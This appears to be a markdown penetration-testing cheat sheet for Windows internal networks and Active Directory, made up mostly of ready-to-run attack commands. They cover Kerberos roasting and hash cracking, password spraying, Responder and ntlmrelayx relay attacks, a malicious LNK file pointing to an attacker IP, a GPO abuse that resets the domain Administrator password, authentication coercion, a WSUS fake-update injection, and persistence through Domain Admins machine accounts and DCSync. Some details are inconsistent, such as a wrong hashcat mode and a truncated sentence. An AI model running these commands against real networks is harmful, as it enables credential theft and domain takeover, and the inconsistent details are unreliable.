Skip to content

Latest commit

 

History

History
2000 lines (1506 loc) · 74.2 KB

01- Internal.md

File metadata and controls

2000 lines (1506 loc) · 74.2 KB
Raw

Internal Network Penetration Testing

Recon

Unauthenticated enumeration

whoami
systeminfo
hostname
whoami /priv
net users
net localgroup
findstr /spin "password"*.*
nslookup .
gpresult /R
set
echo %envar% (CMD)
$env:envar (PowerShell)
Get-WmiObject Win32_ComputerSystem
klist
klist tgt

PowerShelll port scan

PS C:\Users\lutzenfried> 0..65535 | % {echo ((New-object Net.Sockets.TcpClient).Connect("192.168.2.155",$_)) "Port $_ is open!"} 2> $null```

AD search GUI Copy dsquery.dll from C:\Windows\System32

rundll32 dsquery.dll,OpenqueryWindow

Unauthenticated User enumeration

Finding DC IP

nmcli dev show eth0

nslookup -type=SRV _ldap._tcp.dc._msdcs.<domainName>
nslookup -type=SRV _ldap._tcp.dc._msdcs.company.local

User enumeration via Kerberos

--> Require list of possible usernames:

  • Non-existent account : KDC_ERR_C_PRINCIPAL_UNKNOWN
  • A locked or disabled account : KDC_ERR_CLIENT_REVOKED
  • A valid account : KDC_ERR_PREAUTH_REQUIRED

User enumeration without kerberos

Use the DsrGetDcNameEx2,CLDAP ping and NetBIOS MailSlot ping methods respectively to establish if any of the usernames in a provided text file exist on a remote domain controller.

First foothold

NAC Bypass (802.1x)

NAC (Network Access Control) acts as a kind of a gatekeeper to the local network infrastructure. Its usually works with whitelists, blacklists, authentication requirements or host scanning to restrict access and keep unwanted devices out of the network.

NAC can be setup using multiple measures:

  • Filtering of MAC addresses
  • Authentication with username & password
  • Authentication with certificates
  • Fingerprinting
  • Host checks

802.1x EAP-TLS

802.1x EAP-PEAP

Misc techniques

Sometimes trying different mac address such as MacOS device, Switch/Routers, Vmware VM can give you access or redirect you to specific VLAN without restriction.

Username == password

Using crackmapexec to test for password equal to username on domain contoso.com

for word in $(cat users.txt); do crackmapexec smb 10.10.0.10 -u $word -p $word -d contoso.com; done

SMB enumeration

  • smbclient
  • smbmap

SMB Version 1

crackmapexec smb all_ips.txt | grep -a "SMBv1:True" | cut -d " " -f 10

SMB Signing

crackmapexec smb all_ips.txt | grep -a "signing:False" | cut -d " " -f 10

Unsupported operating systems

crackmapexec smb all_ips.txt |  egrep -a "Windows 6.1|Server 2008|Server 2003|Windows 7|Server \(R\) 2008"

Checking NLA and other RDP issue

rdp-sec-check is a Perl script to enumerate the different security settings of an remote destktop service (AKA Terminal Services)

sudo cpan
cpan[1]> install Encoding::BER
rdp-sec-check.pl 10.0.0.93

RPC / SMB null enumeration

rpcclient -U '' -N 10.10.0.10 -c "querygroupmem 0x200" |  cut -d '[' -f 2 | cut -d ']' -f 1

AS-Rep Roasting

During the initial authentication stage, a user requests a Ticket Granting Ticket (TGT) from the KDC in the form of a AS-REQ packet. If the account exists, the KDC will return a TGT encrypted with the account’s credentials, meaning that only a valid user or machine possessing the valid credentials is able to decrypt the ticket

When a TGT request is made, the user must, by default, authenticate to the KDC in order for it to respond. Sometimes, this prior authentication is not requested for some accounts, allowing an attacker to abuse this configuration.

This configuration allows retrieving TGT encrypted with user's credential for users that have Do not require Kerberos preauthentication property selected:

python3 GetNPUsers.py COMPANY.LOCAL/ -usersfile /home/user/users.txt -request -dc-ip 192.168.0.10 -format hashcat

Rubeus.exe asreproast /domain:COMPANY.LOCAL /dc:192.168.0.10 /format:hashcat /outfile:asrep-roast.hashes
hashcat -m 18200 'asrep-roast.hashes' -a 0 ./wordlists/rockyou.txt

Google Project Zero undercover some issue with RC4 and Kerberos authentication.
If a user have Do not require Kerberos preauthentication property there is no more the need to crack the encrypted TGT.

python3 CVE-2022-33679.py evilcorp.local/vulnasrepuser dc-2016.evilcorp.local -dc-ip 192.168.2.60
export KRB5CCNAME=vulnasrepuser_dc-2016.evilcorp.local.ccache 
crackmapexec smb dc-2016.evilcorp.local -k

Authenticated enumeration

nltest /domain_trusts
nltest /trusted_domains
nltest /primary
nltest /sc_query:<domain>
nltest /dclist:<domain>
nltest /dsgetsite
nltest /whowill:<domain> <user>

Domain policy using PowerView

Get-DomainPolicy
(Get-DomainPolicy)."System Access"

Getting password policy

Get domain password policy using ActiveDirectory module. (RSAT)

Get-WindowsCapability -Name RSAT* -Online | Select-Object -Property DisplayName, State
Get-ADDefaultDomainPasswordPolicy

Get all domain fined grained password policy

Get-ADFinedGrainedPasswordPolicy -Filter *

Get password policy for specific user

Get-ADUserResultantPasswordPolicy -Identity john.doe

MISC Enumeration commands

Recursive search for Domain Admins members

dsquery group -name "Domain Admins" | dsget group -expand -members

Get Net session

Get-NetComputer | Get-NetSession

Review SMB Share rights

Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\temp\test -Credentials domain\user

Active Directory user and computer account description

Using crackmapexec to get active directory user description

crackmapexec ldap 10.10.0.10 -u jdoe -p Pass1234 -d company.com -M get-desc-users

--> It is also extremely important to check for computer account description, as computer account are just AD object with description attribute.

Resetting expired passwords remotely

PASSWD_NOT_REQD

If PASSWD_NOTREQD user-Account-Control Attribute Value bit is set then No password is required.

  1. First collect the information from the domain controller:
python ldapdomaindump.py -u example.com\\john -p pass123 -d ';' 10.100.20.1
  1. Once the dumping is done, get the list of users with the PASSWD_NOTREQD flag using the following command:
grep PASSWD_NOTREQD domain_users.grep | grep -v ACCOUNT_DISABLED | awk -F ';' '{print $3}'

Reset password of users who have PASSWD_NOTREQD flag set and have never set a password:

Get-ADUser -Filter "useraccountcontrol -band 32" -Properties PasswordLastSet | Where-Object { $_.PasswordLastSet -eq $null } | select SamAccountName,Name,distinguishedname | Out-GridView

Machine Account Quota

Identify machine account quota domain attribute:

crackmapexec ldap 192.168.0.10 -u jdoe -H XXXXXX:XXXXXXX -M MAQ --kdcHost corp.company.local

Get-ADObject -Identity ((Get-ADDomain).distinguishedname) -Properties ms-DS-MachineAccountQuota

LAPS / LAPS bypass

Retrieving LAPS passwords using Crackmapexec

crackmapexec ldap 192.168.0.10 -u jdoe -H XXXXX:XXXXX -M laps --kdcHost corp.company.local

Admin Count

crackmapexec ldap company.com -u 'jdoe' -p 'Pass1234' -d company.com --admin-count

Checking GPP passwords

crackmapexec smb 10.10.0.10 -u jdoe -p Pass1234 -d company.com -M gpp_password

Using Impackets Get-GPPPassword.py

python3 Get-GPPPassword.py company.com/jdoe:Pass1234@10.10.0.10

Using Metasploit module

use auxiliary/scanner/smb/smb_enum_gpp
msf auxiliary(smb_enum_gpp) > set rhosts 192.168.0.10
msf auxiliary(smb_enum_gpp) > set smbuser jdoe
msf auxiliary(smb_enum_gpp) > set smbpass Pass1234
msf auxiliary(smb_enum_gpp) > exploit

Checking GPP autologin

crackmapexec smb 10.10.0.10 -u jdoe -p Pass1234 -d company.com -M gpp_autologin

Checking share

Checking share access rights with domain user

crackmapexec smb 10.10.0.10 -u jdoe -p Pass1234 -d company.com --shares

Complete review of network share permissions.
--> Powerhuntshare can be run from domain or non domain joined machine.

Running Powerhuntshare from domain joined machine.

Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\temp\test

Print spooler service

Checking if print spooler service is enable using impacket RPCDUMP or crackmapexec (used RPCDUMP but can be used to scan on large range)

python3 rpcdump.py company.com/jdoe:Pass1234@10.10.0.10 | grep 'MS-RPRN\|MS-PAR'
crackmapexec smb rangeIP.txt -u jdoe -p Pass1234 -d company.com -M spooler | grep Spooler

Local admin brute force

Pywerview recon tool

PowerView's functionalities in Python, using the wonderful impacket library.

python pywerview.py get-netuser -w company.local -u jdoe --dc-ip 192.168.0.10 --username jdoe

Recon/Enumeration using BloodHound

. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All

Expanding BloodHound

Exploitation

Identifying Quick Wins

  • Tomcat
  • JavaRMI
  • WebLogic
  • Jboss
nmap -p 8080,1098,1099,1050,8000,8888,8008,37471,40259,9010,7001 -iL ips.txt -oN tomcat_rmi_jboss.txt -sV

adPeas

Password spray

Spraying 3 password attempt for each user every 15 minutes without attempting password=username

spray.sh -smb 192.168.0.10 users.txt seasons.txt 3 15 corp.company.local NOUSERUSER

Spraying 3 password attempts for each user every 15 minutes, attempting password=username and light variations. Stops after 3 or 4 accounts locked out.

python smbspray.py -u users.txt  -p passwords.txt  -d corp.company.local -l 15 -a 3 -ip DC_IP --user_pw

LNK Files

If you get access to a share we can create a malicious .LNK file. This .LNK file will includes a refernece to the attacker computers. You can after choose to Relay the NetNTLM hash or crack it.

lnkup.py --host attackerIP --type ntlm --output out.lnk --execute "shutdown /s"

Using PowerShell

$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\Malicious.lnk")
$lnk.TargetPath = "\\<attackerIP>\@file.txt"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "LNK file"
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()

Potatoes Attacks

Ghost potato

https://shenaniganslabs.io/files/impacket-ghostpotato.zip (Security patch in 2019 CVE-2019-1384)

Remote Potato

https://github.com/antonioCoco/RemotePotato0/ (October 2022 patched)

Juicy Potato

https://medium.com/r3d-buck3t/impersonating-privileges-with-juicy-potato-e5896b20d505 (Patched in Windows 10 1809)

Juicy Potato NG

https://github.com/antonioCoco/JuicyPotatoNG

Hot Potato

https://pentestlab.blog/2017/04/13/hot-potato/ (2016 patch, ex MS16-075)

Sweet Potato

https://www.pentestpartners.com/security-blog/sweetpotato-service-to-system/

https://www.ctfnote.com/red-teaming/privilege-escalation/windows-privilege-escalation/token-impersonation-and-potato-attacks

RPC Misc

AD user password modification using rpcclient
user@host # rpcclient -U supportAccount //192.168.0.100
[...] authenticate using the supportAccount password which needs to be modified
rpcclient $> setuserinfo2 supportAccount 23 SuperNewPassword22

--> Note : If package passing-the-hash is installed on attacker machine, you can even do this with just a NTLM hash. (Flag : --pw-nt-hash)

RPC password spraying
while read x; do echo $x; rpcclient -U “DOMAIN/$x%PasswOrd123” -c “getusername;quit” 192.168.0.110; done < ./userlist.txt

Using bash script:
#/bin/bash
for u in 'cat dom_users.txt'
do echo -n "[*] user: $u" && rpcclient -U "$u%password" -c "getusername;quit" 10.10.10.192
done

Kerberoasting

Service Principal Names (SPN's) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service).

The goal of Kerberoasting is to harvest TGS tickets for services that run on behalf of user accounts in the AD, not computer accounts.

GetUserSPNs.py -request -dc-ip 192.168.1.10 COMPANY.LOCAL/jdoe:PasswordJdoe123 -outputfile hashes.kerberoast
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt

--> To protect against this attack, we must avoid having SPN on user accounts, in favor of machine accounts.
--> If it is necessary, we should use Microsoft’s Managed Service Accounts (MSA) feature, ensuring that the account password is robust and changed regularly and automatically

Kerberos Bronze Bit

https://www.netspi.com/blog/technical/network-penetration-testing/cve-2020-17049-kerberos-bronze-bit-overview/ https://www.netspi.com/blog/technical/network-penetration-testing/cve-2020-17049-kerberos-bronze-bit-theory/ https://www.netspi.com/blog/technical/network-penetration-testing/cve-2020-17049-kerberos-bronze-bit-attack/

Abusing Vulnerable GPO

\SharpGPOAbuse.exe --AddComputerTask --Taskname "Update" --Author DOMAIN\<USER> --Command "cmd.exe" --Arguments "/c net user Administrator Password!@# /domain" --GPOName "ADDITIONAL DC CONFIGURATION"

Abusing MS-SQL Service

. ./PowerUPSQL.ps1
Get-SQLInstanceLocal -Verbose
(Get-SQLServerLinkCrawl -Verbose -Instance "10.10.10.20" -Query 'select * from master..sysservers').customquery 

Import-Module .\powercat.ps1 powercat -l -v -p 443 -t 10000

Relay attacks

Drop the MIC CVE-2019-1040

Exploiting ACL over GPO

Insecure LDAP: LDAPS / Signing / Channel Binding

Insecure LDAP traffic can exposed clients to multiple vulnerabilities and exploitation path such as:

  • Unencrypted LDAP (LDAPS) : Credential and authentication interception (port TCP-UDP/389)
  • LDAP Signing disable : LDAP Relay attack (such as SMB Relay but using LDAP)
  • LDAP Channel Binding :

LDAPS

Domain controllers and clients are in constant exchange and use the LDAP protocol, which communicates via port 389 (TCP and UDP).

In case a customer use LDAP (389) instead of LDAPS (636) you will be able to intercept authentication and credentials.

Why LDAPS is not deployed everywhere:

  • Not all devices are compatible with it (Old telephone systems or legacy applications)
  • Small

Note: If SSL is used you can try to make MITM offering a false certificate, if the user accepts it, you are able to Downgrade the authentication method and see the credentials again.

LDAP Signing disable

LDAP signing adds a digital signature to the connection. It ensures the authenticity and integrity of the transmitted data. This means that the recipient can verify the sender and determine whether the data has been manipulated along the way.

In case LDAP signing is not enable it is possible to relay a valid LDAP session using ntlmrelayx for example. The LDAP relay attack will give you the ability to perform multiple action such as :

  • Dumping LDAP information (ActiveDirectory users/groups/computers information)
  • In case the relayed session is from a Domain Admins user you will be able to directly persiste and create a new Domain Admins user.

Validate LDAP signing is not enforced

crackmapexec ldap domain_controllers.txt -u jdoe -p Password123 -M ldap-signing

LDAP Channel Binding

Channel binding is the act of binding the transport layer and application layer together. In the case of LDAP channel binding, the TLS tunnel and the LDAP application layer are being tied together. When these two layers are tied together it creates a unique fingerprint for the LDAP communication. Any interception of the LDAP communications cannot be re-used as this would require establishing a new TLS tunnel which would invalidate the LDAP communication’s unique fingerprint.

python3 LdapRelayScan.py -dc-ip 192.168.0.10 -u jdoe -p Password123

Bypassing with StartTLS to add a computer for example, using a recent version of ntlmrelayx tool

ntlmrelayx.py -t ldap://172.20.15.209 --no-da --no-acl --no-validate-privs --add-computer 'OFFSECATTACK$' -smb2support --http-port 8080

Unencrypted Protocols in use

sudo nmap -p 389,21,20,80,25,110,143,23 192.169.0.1/24 --open -oN unencrypted_protocols_in_use

SMTP

Port 25

IMAP

Port 143

POP3

Port 110

HTTP

Port 80

Telnet

Port 23

FTP

Port 21

LDAP

LDAPS uses its own distinct network port to connect clients and servers. The default port for LDAP is port 389, but LDAPS uses port 636 and establishes TLS/SSL upon connecting with a client.

SYSVOL / GPP

From Windows client perspective

findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml

The PowerSploit function Get-GPPPassword is most useful for Group Policy Preference exploitation.

From Linux client

Metasploit Module
use auxiliary/scanner/smb/smb_enum_gpp
msf auxiliary(smb_enum_gpp) > set rhosts 192.168.1.103
msf auxiliary(smb_enum_gpp) > set smbuser raj
msf auxiliary(smb_enum_gpp) > set smbpass Ignite@123
msf auxiliary(smb_enum_gpp) > exploit
Metasploit Post-Module : Once you get shell on windows host
use post/windows/gather/credentials/gpp
msf post(windows/gather/credentials/gpp) > set session 1
msf post(windows/gather/credentials/gpp) > exploit
CrackMapExec Module 1 : gpp_password

Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences. Groups.xml, Services.xml, Scheduledtasks.xml, DataSources.xml, Printers.xml, Drives.xml

crackmapexec smb 192.168.0.10 -u jdoe -p Password 123 -M gpp_pasword
CrackMapExec Module 2: gpp_autologin

Searches the domain controller for registry.xml to find autologon information and returns the username and password.

crackmapexec smb 192.168.0.10 -u jdoe -p Password 123 -M gpp_autologin
Impacket Module

Breadth-first search algorithm to recursively find .xml extension files within SYSVOL.

Get-GPPPassword.py company.local/jdoe:Password123@192.168.0.10'
Decrypt the found password manually
gpp-decrypt <encrypted cpassword>

LLMNR / NBT-NS / mDNS

Microsoft systems use Link-Local Multicast Name Resolution (LLMNR) and the NetBIOS Name Service (NBT-NS) for local host resolution when DNS lookups fail. Apple Bonjour and Linux zero-configuration implementations use Multicast DNS (mDNS) to discover systems within a network.

Responder + ntlmrelayx

It is possible to directly relay NetNTLM has to SMB/LDAP/HTTP and DNS session over a victim. If the victim has SMB and/or LDAP signing activated try to relay on other protocols than SMB or LDAP.

Poisoning LLMNR/NetBios-NS response

python3 Responder.py -I eth0 -wbF

Relay over smb to 192.168.0.10, with smb2 support, socks enable, interactive mode and dumping the NetNTLM relayed hash in option

sudo ntlmrelayx.py -t 192.168.0.10 -i -socks -smb2support -debug --output-file ./netntlm.hashes.relay
  • Relay to Exchange (patched since February 2019)

https://github.com/dirkjanm/privexchange/

  • Relay to SCCM

fortra/impacket#1425

WPAD

Many browsers use Web Proxy Auto-Discovery (WPAD) to load proxy settings from the network, download the wpad.dat, Proxy Auto-Config (PAC) file.

A WPAD server provides client proxy settings via a particular URL:

--> When a machine has these protocols enabled, if the local network DNS is not able to resolve the name, the machine will ask to all hosts of the network.

Using Responder we can poison DNS, DHCP, LLMNR and NBT-NS traffic to redirect clients to a malicious WPAD Server.

responder -I eth0 -wFb

--> Backdooring using Responder and WPAD attack Modify Responder configuration file

; Set to On to serve the custom HTML if the URL does not contain .exe
; Set to Off to inject the 'HTMLToInject' in web pages instead
Serve-Html = On

--> Create a specific web page for error or use the default one.

--> Create an implant to be downloaded by the client. By default the error message indicate this URL : http://isaProxysrv/ProxyClient.exe

--> Patch by Microsoft (MS16-077): Location of WPAD file is no longer requested via broadcast protocols bnut only via DNS.

ACL / DACL Exploitation

BloodyAD - AutoBloody
DACL Edit python script
ForceChangePassword

Returns the ACLs associated with jdoe user in DOMAIN.local domain and resolve GUIDs to their display names

Get-ObjectAcl -SamAccountName delegate -ResolveGUIDs | ? {$_.IdentityReference -eq "DOMAIN.local\jdoe"}


. .\PowerView.ps1
Set-DomainUserPassword -Identity User -Verbose

Using rpcclient

rpcclient -U jdoe 10.10.10.192
setuserinfo2 victimUser 23 'Pass123!'
Shadow credentials

(Domain level Windows Server 2016) Bypass rights restrictions on common atributes (ex: RBCD attack) of user and computer accounts

  • NTLM relay: 
    ntlmrelayx.py -t ldap://adhost.domain.com --shadow-credentials --shadow-target WIN-SCCM$ --cert-outfile-path win-sccm_creds --no-dump -no-da --no-acl --no-validate-privs

https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials

MachineAccountQuota (MAQ)

MachineAccountQuota (MAQ) is a domain level attribute that by default permits unprivileged users to attach up to 10 computers to an Active Directory (AD) domain

Various tools exist which can create a machine account from the command line or from an implant such as StandIn, SharpMad and PowerMad.

  • Machine accounts created through MAQ are placed into the Domain Computers group --> In situations where the Domain Computers group has been granted extra privilege, it’s important to remember that this privilege also extends to unprivileged users through MAQ.

  • The creator account is granted write access to some machine account object attributes. Normally, this includes the following attributes:

  1. AccountDisabled
  2. description
  3. displayName
  4. DnsHostName
  5. ServicePrincipalName
  6. userParameters
  7. userAccountControl
  8. msDS-AdditionalDnsHostName
  9. msDS-AllowedToActOnBehalfOfOtherIdentity
  10. samAccountName

  • The machine account itself has write access to some of its own attributes. The list includes the msDS-SupportedEncryptionTypes attribute which can have an impact on the negotiated Kerberos encryption method.

  • The samAccountName can be changed to anything that doesn’t match a samAccountName already present in a domain. --> Interestingly, the samAccountName can even end in a space which permits mimicking any existing domain account. You can strip the $ character also.

Protected Users

Well-known SID/RID: S-1-5-21-<domain>-525

This group was introduced in Windows Server 2012 R2 domain controllers.

Get-ADGroupMember -Identity "Protected Users"

for group in $(rpcclient -U '' -N 10.10.0.10 -c enumdomgroups | grep Protected | cut -d '[' -f 3 | cut -d ']' -f 1); do rpcclient -U '' -N 10.10.0.10 -c "querygroupmem $group"; done

Protected users is a Security Group which aims to create additional protection against compromise of credential regarding its members, such as the followings:

  • Kerberos protocol will not use the weaker DES or RC4 encryption types in the preauthentication process
  • Credential delegation (CredSSP) will not cache the user's plain text credentials
  • Windows Digest will not cache the user's plain text credentials even when Windows Digest is enabled (From windows 8.1 and Server 2012 R2)
  • The user’s account cannot be delegated with Kerberos constrained or unconstrained delegation
  • Members of this group cannot use NTLM
  • Kerberos ticket-granting tickets (TGTs) lifetime = 4 hours

PAC

Check if the DC is vulnerable to CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user

ProxyLogon

ProxyShell

ProxyNotShell

ZeroLogon

crackmapexec smb 10.10.0.10 -u jdoe -p Pass1234 -d company.com -M zerologon

PrintNightmare

https://github.com/outflanknl/PrintNightmare (MS-PAR method)

Petitpotam

PetitPotam, publicly disclosed by French security researcher Lionel Gilles, is comparable to the PrintSpooler bug but utilizes the MS-EFSRPC API to coerce authentication rather than MS-RPRN.

Check to validate host is vulnerable to petitpotam

crackmapexec smb 10.10.0.10 -u jdoe -p Pass1234 -d company.com -M petitpotam

https://github.com/topotam/PetitPotam

Coercer

https://github.com/p0dalirius/Coercer (several methods)

ShadowCoerce

https://github.com/ShutdownRepo/ShadowCoerce (MS-FSRVP method)

DFSCoerce

https://github.com/Wh04m1001/DFSCoerce (MS-DFSNM method)

SpoolSample

https://github.com/leechristensen/SpoolSample (MS-RPRN RPC method)

Dementor

https://gist.github.com/3xocyte/cfaf8a34f76569a8251bde65fe69dccc (improved implementation of SpoolSample)

samAccountName spoofing

MiTM - IPv6 + Relay

SMB Relay

LDAP Relay

Tools: ntlmrelayx, multirelay

Responder + Relay

SMB Relay

LDAP Relay

WSUS Exploitation

In case of WSUS being deployed without SSL/TLS encrypted communications, we can perform a man-in-the-middle attack and inject a fake update.

  • Can only deliver binaries signed by Microsoft (PSExec, BGinfo with VB script)
  • Need to perform ARP Spoofing or tamper with the system's proxy settings (if possible)

--> WSUS Server can be found based on the server hostname (e.g. server-wsus-01) or based on open ports (8530,8531)

Tools

python pywsus.py -H 172.16.205.21 -p 8530 -e PsExec64.exe -c ‘/accepteula /s cmd.exe /c “echo wsus.poc > C:\\poc.txt”‘

Windows Update is a Windows service, wuauclt.exe which run periodically to check for updates.
Registry keys exist that govern various details such:

  • Update server's location
  • Update frequency
  • Privileged Escalation of unprivileged users

--> Communication: Client --> Windows Update Server : HTTP(S) / SOAP XML web service.

WSUS details

WSUS or Windows Software Update Services is the enterprise variant of Windows update.

  • Updates fetched from local server instead of Microsoft Server
  • Updates must be approved by administrator before being pushed out

wsus soap service

MITM wsus soap service

Check WSUS HTTP Misconfiguration:

  • Check Registry on WSUS client machines to validate TLS usage
HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\
WUServer = http://wsus-server.local:8530
  • Check if the computer will use WUServer
HKLMT\Software\Policies\Microsoft\Windows\WindowsUpdate\AU
UseWUServer = 1

LDAP Pass Back

LDAP pass back attack target LDAP credentials used by the MFP within its network configuration (check for default credentials on printers).

The attacker tricks a device to connect to a rogue server to disclose the stored network credentials or hashes while the device trying to authenticate to the server.

2 methods:

  1. nc listener
  2. Rogue LDAP server

Sometimes the domain account used within theses printers are service accounts with interesting privileges and I also found domain admins account credentials being used. In any case if a domain account is used it can give you a first foothold within the domain from an unauthenticated perspective.

SMTP Pass Back

Kerberos attacks

AS-Rep Roasting

Kerberoasting

Timeroasting / TrustRoasting / Computer Spraying

Timeroasting takes advantage of Windows' NTP authentication mechanism, allowing unauthenticated attackers to effectively request a password hash of any computer account by sending an NTP request with that account's RID. This is not a problem when computer accounts are properly generated, but if a non-standard or legacy default password is set this tool allows you to brute-force those offline.

On domain controller (up to Windows Server 2019) if you create a computer account (Workstation1$) with CMD Line (net computer) or through the GUI box and check Assign this computer account as a pre-Windows 2000 Computer.

--> This will set the computer account password to default password that matches the first 14 characters of their computer name, lowercase and without a dollar sign.

python3 timeroast.py 192.168.2.60 -o ntp_hashes

1002:$sntp-ms$3axxxxxxx3$1c04xxxxxxxxxxxxxxxxxxxxxxxxxxxx038
1116:$sntp-ms$11xxxxxxx2$1c04xxxxxxxxxxxxxxxxxxxxxxxxxxxx73e
1119:$sntp-ms$e9xxxxxxxb$1c04xxxxxxxxxxxxxxxxxxxxxxxxxxxxcfa
1117:$sntp-ms$30xxxxxxx5$1c04xxxxxxxxxxxxxxxxxxxxxxxxxxxx2d3
1127:$sntp-ms$71xxxxxxx7$1c04xxxxxxxxxxxxxxxxxxxxxxxxxxxx663
1128:$sntp-ms$51xxxxxxxd$1c04xxxxxxxxxxxxxxxxxxxxxxxxxxxx9f6
1129:$sntp-ms$08xxxxxxxf$1c04xxxxxxxxxxxxxxxxxxxxxxxxxxxxdd4
1131:$sntp-ms$d5xxxxxxxc$1c04xxxxxxxxxxxxxxxxxxxxxxxxxxxx41e
1137:$sntp-ms$13xxxxxxxe$1c04xxxxxxxxxxxxxxxxxxxxxxxxxxxxb80
1138:$sntp-ms$9exxxxxxx0$1c04xxxxxxxxxxxxxxxxxxxxxxxxxxxx767
1139:$sntp-ms$bbxxxxxxxc$1c04xxxxxxxxxxxxxxxxxxxxxxxxxxxxea2
1140:$sntp-ms$9axxxxxxx5$1c04xxxxxxxxxxxxxxxxxxxxxxxxxxxxe01

Cracking NTP Hashes

Format 31300 (SNTP-MS) available to hashcat to crack the NTP hashes.

hashcat -a 0 -m 3130 ntp_hashes ./wordlists/rockyou.txt

MS14-066

Active Directory exploitation

ZeroLogon

Exploiting ADCS

Find PKI Enrollment Services in Active Directory and Certificate Templates Names

crackmapexec ldap 10.10.0.10 -u jdoe -p Pass1234 -d company.com -M adcs
certutil.exe -config - -ping

Enumerate misconfigured templates

ntlmrelayx.py -t ldap://server.corp.ca --dump-adcs

Abusing with NTLM relay to AD CS HTTP endpoint

  • Obtain base64 certificate from User authentication template
 ntlmrelayx.py -6 -t http://CA_server/certsrv/certfnsh.asp -smb2support --adcs --template "User" -debug
  • Obtain PFX certificate. If relaying from Domain Controller, use -template switch
certipy relay -target 'http://CA.domain.com'  -template DomainController

ESC1 -

ESC2 -

ESC3 -

ESC4 -

ESC5

ESC6

ESC7

ESC8

ESC9

ESC10

ESC11

ESC12

ESC13

ESC14

Pass the certificate

to HTTP + NTLM relay to LDAP

Common NTLM relay attacks to perform RBCD use the basic HTTP to LDAP flow.

Coercing computer NTLM authentication and relaying to LDAP involves the SMB to LDAP flow that does not work. The solution is to coerce NTLM authenticaton over HTP (ex: service Webdav) and relay it to LDAP(S) server.

Coercing to Webdav, with credentials:

Check if Webdav is enabled on the target:

cme smb 192.168.10.12 -u snovvcrash -p 'Passw0rd!' -d megacorp.local -M webdav

Webdav is running under service "WebClient" and is not installed by default on Windows Server. If you cannot enable it and you have write permissions on a SMB share of the target:

cme smb 192.168.10.12 -u snovvcrash -p 'Passw0rd!' -d megacorp.local -M drop-sc

Add DNS entry for Responder:

python dnstool.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' --record 'Responder' --action add --data @IP_Responder @IP_LDAP_server

Trigger coercion to Webdav

python dementor.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' Responder@80/test.txt Target.megacorp.local

python3 PetitPotam.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' Responder@80/test Target.megacorp.local

Coercing to HTTP without Webdav service

If you have a Webshell or can execute OS command (ex: OS command injection, xp_cmdshell) on the target, run the following command:

powershell iwr http://IP_address_Responder -UseDefaultCredentials

Exploiting machine accounts (WS01$)

Every computer joined to Active Directory (AD) has an associated computer account in AD. A computer account in AD is a security principal (same as user accounts and security groups) and as such has a number of attributes that are the same as those found on user accounts including a Security IDentifier (SID), memberOf, lastlogondate, passwordlastset, etc.

  • Check the group membership for a machine account, sometime the machine account is member of elevated group or Domain Admins
Get-ADComputer -Filter * -Properties MemberOf | ? {$_.MemberOf}
net group "domain admins" /domain

Converting machine account Hex value to NTLM hash:

import hashlib,binascii hexpass = "e6 5f 92..."
hexpass = hexpass.replace(" ","")
passwd = hexpass.decode("hex")
hash = hashlib.new('md4', passwd).digest()
print binascii.hexlify(hash)

Over-Pass-The-hash

Use the user or computer NTLM hash to request Kerberos tickets. --> Alternative to Pass The hash over NTLM protocol
--> Useful in networks where NTLM protocol is disabled and only Kerberos is allowed.

getTGT.py domain.local/workstation1$ -hashes XXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXX -dc-ip 192.168.0.10 -debug
KRB5CCNAME=/home/test/lutzenfried/tooling/workstation1\$.ccache

Potential error when using Over Pass The Hash attack due to the Kerberos and time.

Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

--> Error raised because of your local time, you need to synchronise the host with the DC: ntpdate <IP of DC>

Pass The ticket

Silver ticket

Kerberos Delegation

Check for system trusted for delegation

crackmapexec ldap 192.168.0.10 -u jdoe -p Password123 --trusted-for-delegation
OR
ldapdomaindump -u "company.local\\jdoe" -p "Password123" 192.168.0.10  
grep TRUSTED_FOR_DELEGATION domain_computers.grep
OR
PS> Get-ADComputer -Filter {TrustedForDelegation -eq $True}

Exploiting RBCD : MachineAccountQuota

Exploiting RBCD : WRITE Priv

From On-Premise to Azure

  • MSOL account
  • AzureAD Connect

Domain Trust

Forest Trust

Lateral movement

smbclient authentication using NTLM hash

smbclient //192.168.0.10/C$ -U corp.company.com/jdoe --pw-nt-hash <NT hash>

wmiexec

Detection

smbexec

Detection

psexec

Detection

atexec

Detection

comexec

Detection

Persistence

Primary Group ID

The primary group id is a a user object attribute and contains relative identifier (RID) for the primary group of the user.
--> By default this is the RID for the Domain Users group (RID 513).

By using the Primary Group ID attribute and a specific Access Control Entry (ACE), an attacker can hide the membership of one group that he is already a member of without having any permissions on the group.

This cool trick cannot work on members of protected groups such as Domain Admins, but can work on members of normal groups such as DnsAdmins, which can be used to escalate to Domain Admins.

Dropping SPN on admin accounts

https://adsecurity.org/?p=3466

Persistence in AD environment

Machine/Computer accounts

Machine accounts could be used as a backdoor for domain persistence by adding them to high privilege groups.

net group "Domain Admins" newMachine01$ /add /domain
python3 secretsdump.py company.local/newMachine01\$:Password123@10.0.0.1 -just-dc-user krbtgt

Machine/Computer accounts 2

Even though that dumping passwords hashes via the DCSync technique is not new and SOC teams might have proper alerting in place, using a computer account to perform the same technique might be a more stealthier approach.

Modification of the “userAccountControl” attribute can transform a computer account to a domain controller.

Computer account to appear as a domain controller:

  • userAccountControl attribute needs to have the value of 0x2000 = ( SERVER_TRUST_ACCOUNT ) decimal : 8192 --> Modification of this attribute requires domain administrator level privileges
Import-Module .\Powermad.psm1
